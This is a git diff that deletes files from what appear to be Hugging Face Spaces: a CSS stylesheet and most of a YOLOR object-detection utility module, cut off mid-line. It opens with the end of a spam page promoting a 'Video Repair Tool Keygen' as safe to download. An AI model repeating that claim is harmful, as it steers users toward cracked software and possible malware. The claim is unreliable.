        • A: Grau Gmbh Video Repair Tool Keygen 17 is safe to use as long as you download it from a trusted source like GitHub. However, it may not be legal to use in some countries or regions where using keygens or cracks is prohibited by law. Therefore, we advise you to check the local laws and regulations before using Grau Gmbh Video Repair Tool Keygen 17.
        • -
        -

        0a6ba089eb
        -
        -
        \ No newline at end of file diff --git a/spaces/rajistics/cars/style.css b/spaces/rajistics/cars/style.css deleted file mode 100644 index 114adf441e9032febb46bc056b2a8bb651075f0d..0000000000000000000000000000000000000000 --- a/spaces/rajistics/cars/style.css +++ /dev/null @@ -1,28 +0,0 @@ -body { - padding: 2rem; - font-family: -apple-system, BlinkMacSystemFont, "Arial", sans-serif; -} - -h1 { - font-size: 16px; - margin-top: 0; -} - -p { - color: rgb(107, 114, 128); - font-size: 15px; - margin-bottom: 10px; - margin-top: 5px; -} - -.card { - max-width: 620px; - margin: 0 auto; - padding: 16px; - border: 1px solid lightgray; - border-radius: 16px; -} - -.card p:last-child { - margin-bottom: 0; -} diff --git a/spaces/razfar/anything-counter/utils/general.py b/spaces/razfar/anything-counter/utils/general.py deleted file mode 100644 index b00dc27701303dc3d117f133f5e85207c715b0f5..0000000000000000000000000000000000000000 --- a/spaces/razfar/anything-counter/utils/general.py +++ /dev/null @@ -1,790 +0,0 @@ -# YOLOR general utils - -import glob -import logging -import math -import os -import platform -import random -import re -import subprocess -import time -from pathlib import Path - -import cv2 -import numpy as np -import pandas as pd -import torch -import torchvision -import yaml - -from utils.google_utils import gsutil_getsize -from utils.metrics import fitness -from utils.torch_utils import init_torch_seeds - -# Settings -torch.set_printoptions(linewidth=320, precision=5, profile='long') -np.set_printoptions(linewidth=320, formatter={'float_kind': '{:11.5g}'.format}) # format short g, %precision=5 -pd.options.display.max_columns = 10 -cv2.setNumThreads(0) # prevent OpenCV from multithreading (incompatible with PyTorch DataLoader) -os.environ['NUMEXPR_MAX_THREADS'] = str(min(os.cpu_count(), 8)) # NumExpr max threads - - -def set_logging(rank=-1): - logging.basicConfig( - format="%(message)s", - level=logging.INFO if rank in [-1, 0] else logging.WARN) - - -def init_seeds(seed=0): - # Initialize random number generator (RNG) seeds - random.seed(seed) - np.random.seed(seed) - init_torch_seeds(seed) - - -def get_latest_run(search_dir='.'): - # Return path to most recent 'last.pt' in /runs (i.e. to --resume from) - last_list = glob.glob(f'{search_dir}/**/last*.pt', recursive=True) - return max(last_list, key=os.path.getctime) if last_list else '' - - -def isdocker(): - # Is environment a Docker container - return Path('/workspace').exists() # or Path('/.dockerenv').exists() - - -def emojis(str=''): - # Return platform-dependent emoji-safe version of string - return str.encode().decode('ascii', 'ignore') if platform.system() == 'Windows' else str - - -def check_online(): - # Check internet connectivity - import socket - try: - socket.create_connection(("1.1.1.1", 443), 5) # check host accesability - return True - except OSError: - return False - - -def check_git_status(): - # Recommend 'git pull' if code is out of date - print(colorstr('github: '), end='') - try: - assert Path('.git').exists(), 'skipping check (not a git repository)' - assert not isdocker(), 'skipping check (Docker image)' - assert check_online(), 'skipping check (offline)' - - cmd = 'git fetch && git config --get remote.origin.url' - url = subprocess.check_output(cmd, shell=True).decode().strip().rstrip('.git') # github repo url - branch = subprocess.check_output('git rev-parse --abbrev-ref HEAD', shell=True).decode().strip() # checked out - n = int(subprocess.check_output(f'git rev-list {branch}..origin/master --count', shell=True)) # commits behind - if n > 0: - s = f"⚠️ WARNING: code is out of date by {n} commit{'s' * (n > 1)}. " \ - f"Use 'git pull' to update or 'git clone {url}' to download latest." - else: - s = f'up to date with {url} ✅' - print(emojis(s)) # emoji-safe - except Exception as e: - print(e) - - -def check_requirements(requirements='requirements.txt', exclude=()): - # Check installed dependencies meet requirements (pass *.txt file or list of packages) - import pkg_resources as pkg - prefix = colorstr('red', 'bold', 'requirements:') - if isinstance(requirements, (str, Path)): # requirements.txt file - file = Path(requirements) - if not file.exists(): - print(f"{prefix} {file.resolve()} not found, check failed.") - return - requirements = [f'{x.name}{x.specifier}' for x in pkg.parse_requirements(file.open()) if x.name not in exclude] - else: # list or tuple of packages - requirements = [x for x in requirements if x not in exclude] - - n = 0 # number of packages updates - for r in requirements: - try: - pkg.require(r) - except Exception as e: # DistributionNotFound or VersionConflict if requirements not met - n += 1 - print(f"{prefix} {e.req} not found and is required by YOLOR, attempting auto-update...") - print(subprocess.check_output(f"pip install '{e.req}'", shell=True).decode()) - - if n: # if packages updated - source = file.resolve() if 'file' in locals() else requirements - s = f"{prefix} {n} package{'s' * (n > 1)} updated per {source}\n" \ - f"{prefix} ⚠️ {colorstr('bold', 'Restart runtime or rerun command for updates to take effect')}\n" - print(emojis(s)) # emoji-safe - - -def check_img_size(img_size, s=32): - # Verify img_size is a multiple of stride s - new_size = make_divisible(img_size, int(s)) # ceil gs-multiple - if new_size != img_size: - print('WARNING: --img-size %g must be multiple of max stride %g, updating to %g' % (img_size, s, new_size)) - return new_size - - -def check_imshow(): - # Check if environment supports image displays - try: - assert not isdocker(), 'cv2.imshow() is disabled in Docker environments' - cv2.imshow('test', np.zeros((1, 1, 3))) - cv2.waitKey(1) - cv2.destroyAllWindows() - cv2.waitKey(1) - return True - except Exception as e: - print(f'WARNING: Environment does not support cv2.imshow() or PIL Image.show() image displays\n{e}') - return False - - -def check_file(file): - # Search for file if not found - if Path(file).is_file() or file == '': - return file - else: - files = glob.glob('./**/' + file, recursive=True) # find file - assert len(files), f'File Not Found: {file}' # assert file was found - assert len(files) == 1, f"Multiple files match '{file}', specify exact path: {files}" # assert unique - return files[0] # return file - - -def check_dataset(dict): - # Download dataset if not found locally - val, s = dict.get('val'), dict.get('download') - if val and len(val): - val = [Path(x).resolve() for x in (val if isinstance(val, list) else [val])] # val path - if not all(x.exists() for x in val): - print('\nWARNING: Dataset not found, nonexistent paths: %s' % [str(x) for x in val if not x.exists()]) - if s and len(s): # download script - print('Downloading %s ...' % s) - if s.startswith('http') and s.endswith('.zip'): # URL - f = Path(s).name # filename - torch.hub.download_url_to_file(s, f) - r = os.system('unzip -q %s -d ../ && rm %s' % (f, f)) # unzip - else: # bash script - r = os.system(s) - print('Dataset autodownload %s\n' % ('success' if r == 0 else 'failure')) # analyze return value - else: - raise Exception('Dataset not found.') - - -def make_divisible(x, divisor): - # Returns x evenly divisible by divisor - return math.ceil(x / divisor) * divisor - - -def clean_str(s): - # Cleans a string by replacing special characters with underscore _ - return re.sub(pattern="[|@#!¡·$€%&()=?¿^*;:,¨´><+]", repl="_", string=s) - - -def one_cycle(y1=0.0, y2=1.0, steps=100): - # lambda function for sinusoidal ramp from y1 to y2 - return lambda x: ((1 - math.cos(x * math.pi / steps)) / 2) * (y2 - y1) + y1 - - -def colorstr(*input): - # Colors a string https://en.wikipedia.org/wiki/ANSI_escape_code, i.e. colorstr('blue', 'hello world') - *args, string = input if len(input) > 1 else ('blue', 'bold', input[0]) # color arguments, string - colors = {'black': '\033[30m', # basic colors - 'red': '\033[31m', - 'green': '\033[32m', - 'yellow': '\033[33m', - 'blue': '\033[34m', - 'magenta': '\033[35m', - 'cyan': '\033[36m', - 'white': '\033[37m', - 'bright_black': '\033[90m', # bright colors - 'bright_red': '\033[91m', - 'bright_green': '\033[92m', - 'bright_yellow': '\033[93m', - 'bright_blue': '\033[94m', - 'bright_magenta': '\033[95m', - 'bright_cyan': '\033[96m', - 'bright_white': '\033[97m', - 'end': '\033[0m', # misc - 'bold': '\033[1m', - 'underline': '\033[4m'} - return ''.join(colors[x] for x in args) + f'{string}' + colors['end'] - - -def labels_to_class_weights(labels, nc=80): - # Get class weights (inverse frequency) from training labels - if labels[0] is None: # no labels loaded - return torch.Tensor() - - labels = np.concatenate(labels, 0) # labels.shape = (866643, 5) for COCO - classes = labels[:, 0].astype(np.int) # labels = [class xywh] - weights = np.bincount(classes, minlength=nc) # occurrences per class - - # Prepend gridpoint count (for uCE training) - # gpi = ((320 / 32 * np.array([1, 2, 4])) ** 2 * 3).sum() # gridpoints per image - # weights = np.hstack([gpi * len(labels) - weights.sum() * 9, weights * 9]) ** 0.5 # prepend gridpoints to start - - weights[weights == 0] = 1 # replace empty bins with 1 - weights = 1 / weights # number of targets per class - weights /= weights.sum() # normalize - return torch.from_numpy(weights) - - -def labels_to_image_weights(labels, nc=80, class_weights=np.ones(80)): - # Produces image weights based on class_weights and image contents - class_counts = np.array([np.bincount(x[:, 0].astype(np.int), minlength=nc) for x in labels]) - image_weights = (class_weights.reshape(1, nc) * class_counts).sum(1) - # index = random.choices(range(n), weights=image_weights, k=1) # weight image sample - return image_weights - - -def coco80_to_coco91_class(): # converts 80-index (val2014) to 91-index (paper) - # https://tech.amikelive.com/node-718/what-object-categories-labels-are-in-coco-dataset/ - # a = np.loadtxt('data/coco.names', dtype='str', delimiter='\n') - # b = np.loadtxt('data/coco_paper.names', dtype='str', delimiter='\n') - # x1 = [list(a[i] == b).index(True) + 1 for i in range(80)] # darknet to coco - # x2 = [list(b[i] == a).index(True) if any(b[i] == a) else None for i in range(91)] # coco to darknet - x = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 27, 28, 31, 32, 33, 34, - 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, - 64, 65, 67, 70, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 84, 85, 86, 87, 88, 89, 90] - return x - - -def xyxy2xywh(x): - # Convert nx4 boxes from [x1, y1, x2, y2] to [x, y, w, h] where xy1=top-left, xy2=bottom-right - y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x) - y[:, 0] = (x[:, 0] + x[:, 2]) / 2 # x center - y[:, 1] = (x[:, 1] + x[:, 3]) / 2 # y center - y[:, 2] = x[:, 2] - x[:, 0] # width - y[:, 3] = x[:, 3] - x[:, 1] # height - return y - - -def xywh2xyxy(x): - # Convert nx4 boxes from [x, y, w, h] to [x1, y1, x2, y2] where xy1=top-left, xy2=bottom-right - y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x) - y[:, 0] = x[:, 0] - x[:, 2] / 2 # top left x - y[:, 1] = x[:, 1] - x[:, 3] / 2 # top left y - y[:, 2] = x[:, 0] + x[:, 2] / 2 # bottom right x - y[:, 3] = x[:, 1] + x[:, 3] / 2 # bottom right y - return y - - -def xywhn2xyxy(x, w=640, h=640, padw=0, padh=0): - # Convert nx4 boxes from [x, y, w, h] normalized to [x1, y1, x2, y2] where xy1=top-left, xy2=bottom-right - y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x) - y[:, 0] = w * (x[:, 0] - x[:, 2] / 2) + padw # top left x - y[:, 1] = h * (x[:, 1] - x[:, 3] / 2) + padh # top left y - y[:, 2] = w * (x[:, 0] + x[:, 2] / 2) + padw # bottom right x - y[:, 3] = h * (x[:, 1] + x[:, 3] / 2) + padh # bottom right y - return y - - -def xyn2xy(x, w=640, h=640, padw=0, padh=0): - # Convert normalized segments into pixel segments, shape (n,2) - y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x) - y[:, 0] = w * x[:, 0] + padw # top left x - y[:, 1] = h * x[:, 1] + padh # top left y - return y - - -def segment2box(segment, width=640, height=640): - # Convert 1 segment label to 1 box label, applying inside-image constraint, i.e. (xy1, xy2, ...) to (xyxy) - x, y = segment.T # segment xy - inside = (x >= 0) & (y >= 0) & (x <= width) & (y <= height) - x, y, = x[inside], y[inside] - return np.array([x.min(), y.min(), x.max(), y.max()]) if any(x) else np.zeros((1, 4)) # xyxy - - -def segments2boxes(segments): - # Convert segment labels to box labels, i.e. (cls, xy1, xy2, ...) to (cls, xywh) - boxes = [] - for s in segments: - x, y = s.T # segment xy - boxes.append([x.min(), y.min(), x.max(), y.max()]) # cls, xyxy - return xyxy2xywh(np.array(boxes)) # cls, xywh - - -def resample_segments(segments, n=1000): - # Up-sample an (n,2) segment - for i, s in enumerate(segments): - x = np.linspace(0, len(s) - 1, n) - xp = np.arange(len(s)) - segments[i] = np.concatenate([np.interp(x, xp, s[:, i]) for i in range(2)]).reshape(2, -1).T # segment xy - return segments - - -def scale_coords(img1_shape, coords, img0_shape, ratio_pad=None): - # Rescale coords (xyxy) from img1_shape to img0_shape - if ratio_pad is None: # calculate from img0_shape - gain = min(img1_shape[0] / img0_shape[0], img1_shape[1] / img0_shape[1]) # gain = old / new - pad = (img1_shape[1] - img0_shape[1] * gain) / 2, (img1_shape[0] - img0_shape[0] * gain) / 2 # wh padding - else: - gain = ratio_pad[0][0] - pad = ratio_pad[1] - - coords[:, [0, 2]] -= pad[0] # x padding - coords[:, [1, 3]] -= pad[1] # y padding - coords[:, :4] /= gain - clip_coords(coords, img0_shape) - return coords - - -def clip_coords(boxes, img_shape): - # Clip bounding xyxy bounding boxes to image shape (height, width) - boxes[:, 0].clamp_(0, img_shape[1]) # x1 - boxes[:, 1].clamp_(0, img_shape[0]) # y1 - boxes[:, 2].clamp_(0, img_shape[1]) # x2 - boxes[:, 3].clamp_(0, img_shape[0]) # y2 - - -def bbox_iou(box1, box2, x1y1x2y2=True, GIoU=False, DIoU=False, CIoU=False, eps=1e-7): - # Returns the IoU of box1 to box2. box1 is 4, box2 is nx4 - box2 = box2.T - - # Get the coordinates of bounding boxes - if x1y1x2y2: # x1, y1, x2, y2 = box1 - b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3] - b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3] - else: # transform from xywh to xyxy - b1_x1, b1_x2 = box1[0] - box1[2] / 2, box1[0] + box1[2] / 2 - b1_y1, b1_y2 = box1[1] - box1[3] / 2, box1[1] + box1[3] / 2 - b2_x1, b2_x2 = box2[0] - box2[2] / 2, box2[0] + box2[2] / 2 - b2_y1, b2_y2 = box2[1] - box2[3] / 2, box2[1] + box2[3] / 2 - - # Intersection area - inter = (torch.min(b1_x2, b2_x2) - torch.max(b1_x1, b2_x1)).clamp(0) * \ - (torch.min(b1_y2, b2_y2) - torch.max(b1_y1, b2_y1)).clamp(0) - - # Union Area - w1, h1 = b1_x2 - b1_x1, b1_y2 - b1_y1 + eps - w2, h2 = b2_x2 - b2_x1, b2_y2 - b2_y1 + eps - union = w1 * h1 + w2 * h2 - inter + eps - - iou = inter / union - - if GIoU or DIoU or CIoU: - cw = torch.max(b1_x2, b2_x2) - torch.min(b1_x1, b2_x1) # convex (smallest enclosing box) width - ch = torch.max(b1_y2, b2_y2) - torch.min(b1_y1, b2_y1) # convex height - if CIoU or DIoU: # Distance or Complete IoU https://arxiv.org/abs/1911.08287v1 - c2 = cw ** 2 + ch ** 2 + eps # convex diagonal squared - rho2 = ((b2_x1 + b2_x2 - b1_x1 - b1_x2) ** 2 + - (b2_y1 + b2_y2 - b1_y1 - b1_y2) ** 2) / 4 # center distance squared - if DIoU: - return iou - rho2 / c2 # DIoU - elif CIoU: # https://github.com/Zzh-tju/DIoU-SSD-pytorch/blob/master/utils/box/box_utils.py#L47 - v = (4 / math.pi ** 2) * torch.pow(torch.atan(w2 / h2) - torch.atan(w1 / h1), 2) - with torch.no_grad(): - alpha = v / (v - iou + (1 + eps)) - return iou - (rho2 / c2 + v * alpha) # CIoU - else: # GIoU https://arxiv.org/pdf/1902.09630.pdf - c_area = cw * ch + eps # convex area - return iou - (c_area - union) / c_area # GIoU - else: - return iou # IoU - - - - -def bbox_alpha_iou(box1, box2, x1y1x2y2=False, GIoU=False, DIoU=False, CIoU=False, alpha=2, eps=1e-9): - # Returns tsqrt_he IoU of box1 to box2. box1 is 4, box2 is nx4 - box2 = box2.T - - # Get the coordinates of bounding boxes - if x1y1x2y2: # x1, y1, x2, y2 = box1 - b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3] - b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3] - else: # transform from xywh to xyxy - b1_x1, b1_x2 = box1[0] - box1[2] / 2, box1[0] + box1[2] / 2 - b1_y1, b1_y2 = box1[1] - box1[3] / 2, box1[1] + box1[3] / 2 - b2_x1, b2_x2 = box2[0] - box2[2] / 2, box2[0] + box2[2] / 2 - b2_y1, b2_y2 = box2[1] - box2[3] / 2, box2[1] + box2[3] / 2 - - # Intersection area - inter = (torch.min(b1_x2, b2_x2) - torch.max(b1_x1, b2_x1)).clamp(0) * \ - (torch.min(b1_y2, b2_y2) - torch.max(b1_y1, b2_y1)).clamp(0) - - # Union Area - w1, h1 = b1_x2 - b1_x1, b1_y2 - b1_y1 + eps - w2, h2 = b2_x2 - b2_x1, b2_y2 - b2_y1 + eps - union = w1 * h1 + w2 * h2 - inter + eps - - # change iou into pow(iou+eps) - # iou = inter / union - iou = torch.pow(inter/union + eps, alpha) - # beta = 2 * alpha - if GIoU or DIoU or CIoU: - cw = torch.max(b1_x2, b2_x2) - torch.min(b1_x1, b2_x1) # convex (smallest enclosing box) width - ch = torch.max(b1_y2, b2_y2) - torch.min(b1_y1, b2_y1) # convex height - if CIoU or DIoU: # Distance or Complete IoU https://arxiv.org/abs/1911.08287v1 - c2 = (cw ** 2 + ch ** 2) ** alpha + eps # convex diagonal - rho_x = torch.abs(b2_x1 + b2_x2 - b1_x1 - b1_x2) - rho_y = torch.abs(b2_y1 + b2_y2 - b1_y1 - b1_y2) - rho2 = ((rho_x ** 2 + rho_y ** 2) / 4) ** alpha # center distance - if DIoU: - return iou - rho2 / c2 # DIoU - elif CIoU: # https://github.com/Zzh-tju/DIoU-SSD-pytorch/blob/master/utils/box/box_utils.py#L47 - v = (4 / math.pi ** 2) * torch.pow(torch.atan(w2 / h2) - torch.atan(w1 / h1), 2) - with torch.no_grad(): - alpha_ciou = v / ((1 + eps) - inter / union + v) - # return iou - (rho2 / c2 + v * alpha_ciou) # CIoU - return iou - (rho2 / c2 + torch.pow(v * alpha_ciou + eps, alpha)) # CIoU - else: # GIoU https://arxiv.org/pdf/1902.09630.pdf - # c_area = cw * ch + eps # convex area - # return iou - (c_area - union) / c_area # GIoU - c_area = torch.max(cw * ch + eps, union) # convex area - return iou - torch.pow((c_area - union) / c_area + eps, alpha) # GIoU - else: - return iou # torch.log(iou+eps) or iou - - -def box_iou(box1, box2): - # https://github.com/pytorch/vision/blob/master/torchvision/ops/boxes.py - """ - Return intersection-over-union (Jaccard index) of boxes. - Both sets of boxes are expected to be in (x1, y1, x2, y2) format. - Arguments: - box1 (Tensor[N, 4]) - box2 (Tensor[M, 4]) - Returns: - iou (Tensor[N, M]): the NxM matrix containing the pairwise - IoU values for every element in boxes1 and boxes2 - """ - - def box_area(box): - # box = 4xn - return (box[2] - box[0]) * (box[3] - box[1]) - - area1 = box_area(box1.T) - area2 = box_area(box2.T) - - # inter(N,M) = (rb(N,M,2) - lt(N,M,2)).clamp(0).prod(2) - inter = (torch.min(box1[:, None, 2:], box2[:, 2:]) - torch.max(box1[:, None, :2], box2[:, :2])).clamp(0).prod(2) - return inter / (area1[:, None] + area2 - inter) # iou = inter / (area1 + area2 - inter) - - -def wh_iou(wh1, wh2): - # Returns the nxm IoU matrix. wh1 is nx2, wh2 is mx2 - wh1 = wh1[:, None] # [N,1,2] - wh2 = wh2[None] # [1,M,2] - inter = torch.min(wh1, wh2).prod(2) # [N,M] - return inter / (wh1.prod(2) + wh2.prod(2) - inter) # iou = inter / (area1 + area2 - inter) - - -def box_giou(box1, box2): - """ - Return generalized intersection-over-union (Jaccard index) between two sets of boxes. - Both sets of boxes are expected to be in ``(x1, y1, x2, y2)`` format with - ``0 <= x1 < x2`` and ``0 <= y1 < y2``. - Args: - boxes1 (Tensor[N, 4]): first set of boxes - boxes2 (Tensor[M, 4]): second set of boxes - Returns: - Tensor[N, M]: the NxM matrix containing the pairwise generalized IoU values - for every element in boxes1 and boxes2 - """ - - def box_area(box): - # box = 4xn - return (box[2] - box[0]) * (box[3] - box[1]) - - area1 = box_area(box1.T) - area2 = box_area(box2.T) - - inter = (torch.min(box1[:, None, 2:], box2[:, 2:]) - torch.max(box1[:, None, :2], box2[:, :2])).clamp(0).prod(2) - union = (area1[:, None] + area2 - inter) - - iou = inter / union - - lti = torch.min(box1[:, None, :2], box2[:, :2]) - rbi = torch.max(box1[:, None, 2:], box2[:, 2:]) - - whi = (rbi - lti).clamp(min=0) # [N,M,2] - areai = whi[:, :, 0] * whi[:, :, 1] - - return iou - (areai - union) / areai - - -def box_ciou(box1, box2, eps: float = 1e-7): - """ - Return complete intersection-over-union (Jaccard index) between two sets of boxes. - Both sets of boxes are expected to be in ``(x1, y1, x2, y2)`` format with - ``0 <= x1 < x2`` and ``0 <= y1 < y2``. - Args: - boxes1 (Tensor[N, 4]): first set of boxes - boxes2 (Tensor[M, 4]): second set of boxes - eps (float, optional): small number to prevent division by zero. Default: 1e-7 - Returns: - Tensor[N, M]: the NxM matrix containing the pairwise complete IoU values - for every element in boxes1 and boxes2 - """ - - def box_area(box): - # box = 4xn - return (box[2] - box[0]) * (box[3] - box[1]) - - area1 = box_area(box1.T) - area2 = box_area(box2.T) - - inter = (torch.min(box1[:, None, 2:], box2[:, 2:]) - torch.max(box1[:, None, :2], box2[:, :2])).clamp(0).prod(2) - union = (area1[:, None] + area2 - inter) - - iou = inter / union - - lti = torch.min(box1[:, None, :2], box2[:, :2]) - rbi = torch.max(box1[:, None, 2:], box2[:, 2:]) - - whi = (rbi - lti).clamp(min=0) # [N,M,2] - diagonal_distance_squared = (whi[:, :, 0] ** 2) + (whi[:, :, 1] ** 2) + eps - - # centers of boxes - x_p = (box1[:, None, 0] + box1[:, None, 2]) / 2 - y_p = (box1[:, None, 1] + box1[:, None, 3]) / 2 - x_g = (box2[:, 0] + box2[:, 2]) / 2 - y_g = (box2[:, 1] + box2[:, 3]) / 2 - # The distance between boxes' centers squared. - centers_distance_squared = (x_p - x_g) ** 2 + (y_p - y_g) ** 2 - - w_pred = box1[:, None, 2] - box1[:, None, 0] - h_pred = box1[:, None, 3] - box1[:, None, 1] - - w_gt = box2[:, 2] - box2[:, 0] - h_gt = box2[:, 3] - box2[:, 1] - - v = (4 / (torch.pi ** 2)) * torch.pow((torch.atan(w_gt / h_gt) - torch.atan(w_pred / h_pred)), 2) - with torch.no_grad(): - alpha = v / (1 - iou + v + eps) - return iou - (centers_distance_squared / diagonal_distance_squared) - alpha * v - - -def box_diou(box1, box2, eps: float = 1e-7): - """ - Return distance intersection-over-union (Jaccard index) between two sets of boxes. - Both sets of boxes are expected to be in ``(x1, y1, x2, y2)`` format with - ``0 <= x1 < x2`` and ``0 <= y1 < y2``. - Args: - boxes1 (Tensor[N, 4]): first set of boxes - boxes2 (Tensor[M, 4]): second set of boxes - eps (float, optional): small number to prevent division by zero. Default: 1e-7 - Returns: - Tensor[N, M]: the NxM matrix containing the pairwise distance IoU values - for every element in boxes1 and boxes2 - """ - - def box_area(box): - # box = 4xn - return (box[2] - box[0]) * (box[3] - box[1]) - - area1 = box_area(box1.T) - area2 = box_area(box2.T) - - inter = (torch.min(box1[:, None, 2:], box2[:, 2:]) - torch.max(box1[:, None, :2], box2[:, :2])).clamp(0).prod(2) - union = (area1[:, None] + area2 - inter) - - iou = inter / union - - lti = torch.min(box1[:, None, :2], box2[:, :2]) - rbi = torch.max(box1[:, None, 2:], box2[:, 2:]) - - whi = (rbi - lti).clamp(min=0) # [N,M,2] - diagonal_distance_squared = (whi[:, :, 0] ** 2) + (whi[:, :, 1] ** 2) + eps - - # centers of boxes - x_p = (box1[:, None, 0] + box1[:, None, 2]) / 2 - y_p = (box1[:, None, 1] + box1[:, None, 3]) / 2 - x_g = (box2[:, 0] + box2[:, 2]) / 2 - y_g = (box2[:, 1] + box2[:, 3]) / 2 - # The distance between boxes' centers squared. - centers_distance_squared = (x_p - x_g) ** 2 + (y_p - y_g) ** 2 - - # The distance IoU is the IoU penalized by a normalized - # distance between boxes' centers squared. - return iou - (centers_distance_squared / diagonal_distance_squared) - - -def non_max_suppression(prediction, conf_thres=0.25, iou_thres=0.45, classes=None, agnostic=False, multi_label=False, - labels=()): - """Runs Non-Maximum Suppression (NMS) on inference results - - Returns: - list of detections, on (n,6) tensor per image [xyxy, conf, cls] - """ - - nc = prediction.shape[2] - 5 # number of classes - xc = prediction[..., 4] > conf_thres # candidates - - # Settings - min_wh, max_wh = 2, 4096 # (pixels) minimum and maximum box width and height - max_det = 300 # maximum number of detections per image - max_nms = 30000 # maximum number of boxes into torchvision.ops.nms() - time_limit = 10.0 # seconds to quit after - redundant = True # require redundant detections - multi_label &= nc > 1 # multiple labels per box (adds 0.5ms/img) - merge = False # use merge-NMS - - t = time.time() - output = [torch.zeros((0, 6), device=prediction.device)] * prediction.shape[0] - for xi, x in enumerate(prediction): # image index, image inference - # Apply constraints - # x[((x[..., 2:4] < min_wh) | (x[..., 2:4] > max_wh)).any(1), 4] = 0 # width-height - x = x[xc[xi]] # confidence - - # Cat apriori labels if autolabelling - if labels and len(labels[xi]): - l = labels[xi] - v = torch.zeros((len(l), nc + 5), device=x.device) - v[:, :4] = l[:, 1:5] # box - v[:, 4] = 1.0 # conf - v[range(len(l)), l[:, 0].long() + 5] = 1.0 # cls - x = torch.cat((x, v), 0) - - # If none remain process next image - if not x.shape[0]: - continue - - # Compute conf - x[:, 5:] *= x[:, 4:5] # conf = obj_conf * cls_conf - - # Box (center x, center y, width, height) to (x1, y1, x2, y2) - box = xywh2xyxy(x[:, :4]) - - # Detections matrix nx6 (xyxy, conf, cls) - if multi_label: - i, j = (x[:, 5:] > conf_thres).nonzero(as_tuple=False).T - x = torch.cat((box[i], x[i, j + 5, None], j[:, None].float()), 1) - else: # best class only - conf, j = x[:, 5:].max(1, keepdim=True) - x = torch.cat((box, conf, j.float()), 1)[conf.view(-1) > conf_thres] - - # Filter by class - if classes is not None: - x = x[(x[:, 5:6] == torch.tensor(classes, device=x.device)).any(1)] - - # Apply finite constraint - # if not torch.isfinite(x).all(): - # x = x[torch.isfinite(x).all(1)] - - # Check shape - n = x.shape[0] # number of boxes - if not n: # no boxes - continue - elif n > max_nms: # excess boxes - x = x[x[:, 4].argsort(descending=True)[:max_nms]] # sort by confidence - - # Batched NMS - c = x[:, 5:6] * (0 if agnostic else max_wh) # classes - boxes, scores = x[:, :4] + c, x[:, 4] # boxes (offset by class), scores - i = torchvision.ops.nms(boxes, scores, iou_thres) # NMS - if i.shape[0] > max_det: # limit detections - i = i[:max_det] - if merge and (1 < n < 3E3): # Merge NMS (boxes merged using weighted mean) - # update boxes as boxes(i,4) = weights(i,n) * boxes(n,4) - iou = box_iou(boxes[i], boxes) > iou_thres # iou matrix - weights = iou * scores[None] # box weights - x[i, :4] = torch.mm(weights, x[:, :4]).float() / weights.sum(1, keepdim=True) # merged boxes - if redundant: - i = i[iou.sum(1) > 1] # require redundancy - - output[xi] = x[i] - if (time.time() - t) > time_limit: - print(f'WARNING: NMS time limit {time_limit}s exceeded') - break # time limit exceeded - - return output - - -def strip_optimizer(f='best.pt', s=''): # from utils.general import *; strip_optimizer() - # Strip optimizer from 'f' to finalize training, optionally save as 's' - x = torch.load(f, map_location=torch.device('cpu')) - if x.get('ema'): - x['model'] = x['ema'] # replace model with ema - for k in 'optimizer', 'training_results', 'wandb_id', 'ema', 'updates': # keys - x[k] = None - x['epoch'] = -1 - x['model'].half() # to FP16 - for p in x['model'].parameters(): - p.requires_grad = False - torch.save(x, s or f) - mb = os.path.getsize(s or f) / 1E6 # filesize - print(f"Optimizer stripped from {f},{(' saved as %s,' % s) if s else ''} {mb:.1f}MB") - - -def print_mutation(hyp, results, yaml_file='hyp_evolved.yaml', bucket=''): - # Print mutation results to evolve.txt (for use with train.py --evolve) - a = '%10s' * len(hyp) % tuple(hyp.keys()) # hyperparam keys - b = '%10.3g' * len(hyp) % tuple(hyp.values()) # hyperparam values - c = '%10.4g' * len(results) % results # results (P, R, mAP@0.5, mAP@0.5:0.95, val_losses x 3) - print('\n%s\n%s\nEvolved fitness: %s\n' % (a, b, c)) - - if bucket: - url = 'gs://%s/evolve.txt' % bucket - if gsutil_getsize(url) > (os.path.getsize('evolve.txt') if os.path.exists('evolve.txt') else 0): - os.system('gsutil cp %s .' % url) # download evolve.txt if larger than local - - with open('evolve.txt', 'a') as f: # append result - f.write(c + b + '\n') - x = np.unique(np.loadtxt('evolve.txt', ndmin=2), axis=0) # load unique rows - x = x[np.argsort(-fitness(x))] # sort - np.savetxt('evolve.txt', x, '%10.3g') # save sort by fitness - - # Save yaml - for i, k in enumerate(hyp.keys()): - hyp[k] = float(x[0, i + 7]) - with open(yaml_file, 'w') as f: - results = tuple(x[0, :7]) - c = '%10.4g' * len(results) % results # results (P, R, mAP@0.5, mAP@0.5:0.95, val_losses x 3) - f.write('# Hyperparameter Evolution Results\n# Generations: %g\n# Metrics: ' % len(x) + c + '\n\n') - yaml.dump(hyp, f, sort_keys=False) - - if bucket: - os.system('gsutil cp evolve.txt %s gs://%s' % (yaml_file, bucket)) # upload - - -def apply_classifier(x, model, img, im0): - # applies a second stage classifier to yolo outputs - im0 = [im0] if isinstance(im0, np.ndarray) else im0 - for i, d in enumerate(x): # per image - if d is not None and len(d): - d = d.clone() - - # Reshape and pad cutouts - b = xyxy2xywh(d[:, :4]) # boxes - b[:, 2:] = b[:, 2:].max(1)[0].unsqueeze(1) # rectangle to square - b[:, 2:] = b[:, 2:] * 1.3 + 30 # pad - d[:, :4] = xywh2xyxy(b).long() - - # Rescale boxes from img_size to im0 size - scale_coords(img.shape[2:], d[:, :4], im0[i].shape) - - # Classes - pred_cls1 = d[:, 5].long() - ims = [] - for j, a in enumerate(d): # per item - cutout = im0[i][int(a[1]):int(a[3]), int(a[0]):int(a[2])] - im = cv2.resize(cutout, (224, 224)) # BGR - # 